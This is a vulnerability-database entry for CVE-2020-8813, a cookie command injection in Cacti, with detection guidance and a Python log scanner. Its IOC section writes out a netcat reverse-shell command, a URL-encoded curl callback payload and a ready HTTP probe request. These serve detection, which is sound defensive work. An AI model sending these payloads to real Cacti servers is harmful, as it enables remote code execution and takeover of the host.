cbcvebase.
CVE-2020-8813
published 2020-02-22

Priority: P188 high | CVSS 3.1: 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 73.78% (99.4th percentile)
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.

Affected

11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cacti | cacti | | |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| cacti | cacti | >= 0 < 1.2.10+ds1-1 | 1.2.10+ds1-1 |
| debian | cacti | < cacti 1.2.10+ds1-1 (bookworm) | cacti 1.2.10+ds1-1 (bookworm) |
| debian | debian_linux | | |
| fedoraproject | fedora | | |
| fedoraproject | fedora | | |
| fedoraproject | fedora | | |
| opmantek | open-audit | | |

Detection & IOCs (extracted from sources)

path: /graph_realtime.php?action=init
cookie: Cacti=<shell-metachar-payload>
command: ;nc${IFS}-e${IFS}/bin/bash${IFS}<ip>${IFS}<port>
url: /graph_realtime.php?action=init
cookie: Cacti=%3Bcurl%20http%3A//<interactsh-url>
sigma
id: CVE-2020-8813
http:
- raw:
  - |
    GET /graph_realtime.php?action=init HTTP/1.1
    Host: {{Hostname}}
    Cookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}
  • Monitor HTTP GET requests to /graph_realtime.php?action=init with a 'Cacti' cookie containing shell metacharacters (e.g., semicolons, ${IFS}, nc, bash).
  • Alert on the 'Cacti' cookie value containing URL-encoded shell injection patterns such as %3B (semicolon), %24%7BIFS%7D, or nc/bash references.
  • Detect POST requests to /user_admin.php enabling guest realtime graph permissions (section25=on, section7=on, tab=realms) as a precursor to exploitation.
  • Check for the string 'poller_realtime.php' in the response body of /graph_realtime.php?action=init as an indicator that the guest realtime feature is enabled and the target is vulnerable.
  • Use Shodan/FOFA queries for Cacti login pages (favicon hash -1797138069, title 'login to cacti') to identify exposed instances for proactive patching.
  • The unauthenticated RCE path requires the 'Guest Realtime Graphs' privilege to be enabled on the Cacti instance; exploitation is not possible if this setting is disabled.
  • The authenticated exploit variant first enables guest realtime permissions via /user_admin.php before sending the malicious cookie, meaning admin credentials are required for that attack path.
  • The Metasploit module defaults to port 443 with SSL and uses php/meterpreter/reverse_tcp as the default payload; detection rules should account for HTTPS traffic to the vulnerable endpoint.
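
The cookie checks from the first two monitoring bullets, written as log-scanning logic. This is an added example, not code from the sources above; it assumes a legitimate Cacti cookie holds a PHP session ID (letters, digits, ',' and '-'), and the function names and sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: a legitimate 'Cacti' cookie is a PHP session ID, whose
# alphabet is limited to letters, digits, ',' and '-'.
SESSION_ID = re.compile(r"[A-Za-z0-9,-]+")
# Shell metacharacters named on this page (';', '${IFS}') plus common ones.
SHELL_HINTS = re.compile(r"[;|&`$<>(){}\\\s]")

def cacti_cookie(cookie_header):
    """Return the URL-decoded value of the 'Cacti' cookie, or None if absent."""
    for pair in cookie_header.split(";"):
        name, sep, value = pair.strip().partition("=")
        if sep and name == "Cacti":
            return unquote(value)
    return None

def classify(target, cookie_header):
    """Return 'ok', 'suspicious' or 'injection' for one logged request."""
    url = urlsplit(target)
    if not url.path.endswith("/graph_realtime.php"):
        return "ok"
    if parse_qs(url.query).get("action") != ["init"]:
        return "ok"
    value = cacti_cookie(cookie_header)
    if value is None or SESSION_ID.fullmatch(value):
        return "ok"
    # An empty value also lands here: a raw ';' in the payload ends the
    # cookie pair early, leaving 'Cacti=' with nothing after it.
    return "injection" if SHELL_HINTS.search(value) else "suspicious"

# Constructed sample records: (request target, Cookie header).
SAMPLES = [
    ("/graph_realtime.php?action=init", "Cacti=0a1b2c3d4e5f6a7b8c9d0e1f2a"),
    ("/cacti/graph_realtime.php?action=init",
     "Cacti=%3Bcurl%20http%3A//collector.example.invalid"),
    ("/graph_realtime.php?action=init", "Cacti=%24%7BIFS%7Did"),
    ("/graph_realtime.php?action=init", "Cacti=;id; theme=dark"),
    ("/graph_realtime.php?action=init", "Cacti=abc.def"),
    ("/graph_view.php?action=tree", "Cacti=%3Bid"),
]

def scan(records):
    """Classify every (target, cookie) record and return the verdicts."""
    return [classify(target, cookie) for target, cookie in records]

if __name__ == "__main__":
    for (target, cookie), verdict in zip(SAMPLES, scan(SAMPLES)):
        print(f"{verdict:10} {target}  Cookie: {cookie}")
```

Common web server log formats do not record the Cookie header, so this needs a log format or proxy that captures it.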

CVSS provenance

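| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| osv | | 8.8 | HIGH | |
| vulncheck | | 8.8 | HIGH | |
| vendor_debian | | 8.8 | HIGH | |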